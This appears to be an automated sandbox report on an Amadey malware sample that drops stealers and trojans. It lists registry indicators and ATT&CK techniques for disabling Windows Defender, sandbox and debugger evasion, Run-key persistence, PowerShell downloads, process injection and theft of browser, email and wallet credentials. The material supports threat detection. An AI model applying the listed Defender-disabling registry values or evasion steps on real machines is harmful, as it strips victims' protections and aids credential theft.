amadey | 91cb26a8c61b268414be31010f6a8e894bca70579775d4e1f0acc32da3201e12

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE

Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
stealer povertystealer
Povertystealer family
povertystealer
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
Systembc family
systembc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 27 IoCs

Query Registry

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e984a62c31.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5fdc363345.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	e0600fa4a5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	agndts.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5f8da7bbdafaed3095a2fef9f7caf45c.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8QQOJj9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	uXivbut.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ebp51gY.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9222c12528.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	30a0979fbd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ftS1RPn.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ebp51gY.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	8QQOJj9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ftS1RPn.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	uXivbut.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	video.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MAl7pjE.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7nSTXG6.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
140	5516	powershell.exe
160	5160	powershell.exe
176	748	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5516	powershell.exe
5160	powershell.exe
748	powershell.exe
5216	powershell.exe
4048	powershell.exe
5896	powershell.exe

Downloads MZ/PE file 29 IoCs

flow	pid	Process
309	3480	e984a62c31.exe
309	3480	e984a62c31.exe
309	3480	e984a62c31.exe
309	3480	e984a62c31.exe
309	3480	e984a62c31.exe
309	3480	e984a62c31.exe
140	5516	powershell.exe
160	5160	powershell.exe
176	748	powershell.exe
10	3976	skotes.exe
10	3976	skotes.exe
10	3976	skotes.exe
10	3976	skotes.exe
10	3976	skotes.exe
10	3976	skotes.exe
10	3976	skotes.exe
10	3976	skotes.exe
10	3976	skotes.exe
10	3976	skotes.exe
10	3976	skotes.exe
10	3976	skotes.exe
10	3976	skotes.exe
10	3976	skotes.exe
10	3976	skotes.exe
10	3976	skotes.exe
132	3976	skotes.exe
132	3976	skotes.exe
132	3976	skotes.exe
132	3976	skotes.exe

Uses browser remote debugging 2 TTPs 22 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
4732	chrome.exe
4248	chrome.exe
1672	msedge.exe
6072	chrome.exe
1668	chrome.exe
548	msedge.exe
1848	msedge.exe
3692	chrome.exe
488	chrome.exe
3024	msedge.exe
2388	msedge.exe
4800	chrome.exe
6632	msedge.exe
6608	msedge.exe
4928	msedge.exe
2252	chrome.exe
4984	msedge.exe
3688	msedge.exe
5320	chrome.exe
1596	chrome.exe
548	chrome.exe
1660	chrome.exe

Checks BIOS information in registry 2 TTPs 54 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	uXivbut.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	uXivbut.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	video.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e984a62c31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Gxtuum.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ftS1RPn.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ebp51gY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MAl7pjE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7nSTXG6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ftS1RPn.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	agndts.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	agndts.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	30a0979fbd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MAl7pjE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7nSTXG6.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ftS1RPn.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Gxtuum.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5f8da7bbdafaed3095a2fef9f7caf45c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Gxtuum.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	video.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Gxtuum.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e984a62c31.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5fdc363345.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5f8da7bbdafaed3095a2fef9f7caf45c.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ebp51gY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9222c12528.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	30a0979fbd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5fdc363345.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Gxtuum.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Gxtuum.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ebp51gY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	uXivbut.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	uXivbut.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ebp51gY.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8QQOJj9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9222c12528.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8QQOJj9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8QQOJj9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8QQOJj9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	e0600fa4a5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	e0600fa4a5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ftS1RPn.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation	5f8da7bbdafaed3095a2fef9f7caf45c.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation	uXivbut.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation	Gxtuum.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation	7nSTXG6.exe

Executes dropped EXE 36 IoCs

pid	Process
3976	skotes.exe
4828	MAl7pjE.exe
4528	lwtLxxH.exe
1560	7nSTXG6.exe
3696	ebp51gY.exe
1112	ftS1RPn.exe
5000	8QQOJj9.exe
3372	uXivbut.exe
4072	Gxtuum.exe
1104	e521e66b6b.exe
408	DF9PCFR.exe
1236	video.exe
3336	7tzlyz8.exe
5012	skotes.exe
4624	Gxtuum.exe
5012	agndts.exe
5324	36c0490467.exe
6088	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
5432	9222c12528.exe
3480	e984a62c31.exe
3884	483d2fa8a0d53818306efeb32d3.exe
5184	151f9773d5.exe
4992	5e812bac6f.exe
6592	30a0979fbd.exe
7104	TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE
2680	5fdc363345.exe
7020	d7efae0799.exe
4856	5a3fcf8817.exe
1036	skotes.exe
5676	Gxtuum.exe
6328	e0600fa4a5.exe
6556	ftS1RPn.exe
2684	ebp51gY.exe
6944	DF9PCFR.exe
1036	uXivbut.exe
224	8QQOJj9.exe

Identifies Wine through registry keys 2 TTPs 27 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	MAl7pjE.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	video.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	9222c12528.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	7nSTXG6.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	8QQOJj9.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	uXivbut.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	e984a62c31.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	30a0979fbd.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	Gxtuum.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	5f8da7bbdafaed3095a2fef9f7caf45c.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	ebp51gY.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	agndts.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	e0600fa4a5.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	ftS1RPn.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	ebp51gY.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	uXivbut.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	ftS1RPn.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	Gxtuum.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	Gxtuum.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	5fdc363345.exe
Key opened	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine	8QQOJj9.exe

Loads dropped DLL 2 IoCs

pid	Process
3480	e984a62c31.exe
3480	e984a62c31.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e984a62c31.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091315001\\e984a62c31.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\151f9773d5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091316001\\151f9773d5.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e812bac6f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091317001\\5e812bac6f.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\36c0490467.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091274101\\36c0490467.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091275021\\am_no.cmd"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9222c12528.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091314001\\9222c12528.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
48	ipinfo.io

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0007000000023c95-418.dat	autoit_exe
behavioral2/files/0x0007000000023ca7-608.dat	autoit_exe
behavioral2/files/0x0007000000023cb2-652.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 27 IoCs

pid	Process
1192	5f8da7bbdafaed3095a2fef9f7caf45c.exe
3976	skotes.exe
4828	MAl7pjE.exe
1560	7nSTXG6.exe
3696	ebp51gY.exe
1112	ftS1RPn.exe
5000	8QQOJj9.exe
3372	uXivbut.exe
4072	Gxtuum.exe
1236	video.exe
5012	skotes.exe
4624	Gxtuum.exe
5012	agndts.exe
6088	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
5432	9222c12528.exe
3480	e984a62c31.exe
3884	483d2fa8a0d53818306efeb32d3.exe
6592	30a0979fbd.exe
7104	TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE
2680	5fdc363345.exe
5676	Gxtuum.exe
1036	skotes.exe
6328	e0600fa4a5.exe
6556	ftS1RPn.exe
2684	ebp51gY.exe
1036	uXivbut.exe
224	8QQOJj9.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1104 set thread context of 5108	1104	e521e66b6b.exe	128
PID 408 set thread context of 1252	408	DF9PCFR.exe	168
PID 1104 set thread context of 5800	1104	e521e66b6b.exe	226
PID 5108 set thread context of 6700	5108	AddInProcess32.exe	230

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\Test Task17.job	video.exe
File created	C:\Windows\Tasks\skotes.job	5f8da7bbdafaed3095a2fef9f7caf45c.exe
File created	C:\Windows\Tasks\Gxtuum.job	uXivbut.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 63 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ebp51gY.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	uXivbut.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	30a0979fbd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7nSTXG6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e984a62c31.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	uXivbut.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8QQOJj9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e521e66b6b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DF9PCFR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	151f9773d5.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	151f9773d5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e0600fa4a5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	151f9773d5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ebp51gY.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempL2LRA8HTKDVQEMNZ2NBS23NHAGTZXGUC.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5e812bac6f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempONUIR2J4E5PPRDDLMFMY1EJIOZLABVEQ.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	36c0490467.exe
